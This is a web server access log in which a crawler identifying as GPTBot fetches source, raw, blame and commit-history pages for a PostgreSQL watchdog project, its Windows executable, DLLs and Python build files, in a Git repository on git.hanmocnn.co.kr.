"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10865] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 10857] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 10855] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 10848] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 10852] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16191] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:13:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11160] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:13:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12106] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:13:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10131] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist" +[17/Feb/2026:13:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11781] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10199] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10411] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10427] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:13:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10408] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10184] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10379] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 378858] [Gzip 29.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:13:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build" [Client 74.7.227.38] [Length 10383] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build" +[17/Feb/2026:13:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 252268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:13:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 63765] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:13:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:13:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10836] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:13:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:13:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 118020] [Gzip 19.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:13:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10930] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10997] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 299024] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:13:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 166070] [Gzip 20.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:13:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:13:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1135869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:13:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1765757] [Gzip 21.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:13:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 252268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:13:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9872] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:13:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 378829] [Gzip 29.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:13:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10188] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48958] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13037] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9543] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:13:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 525808] [Gzip 23.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:13:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 76184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 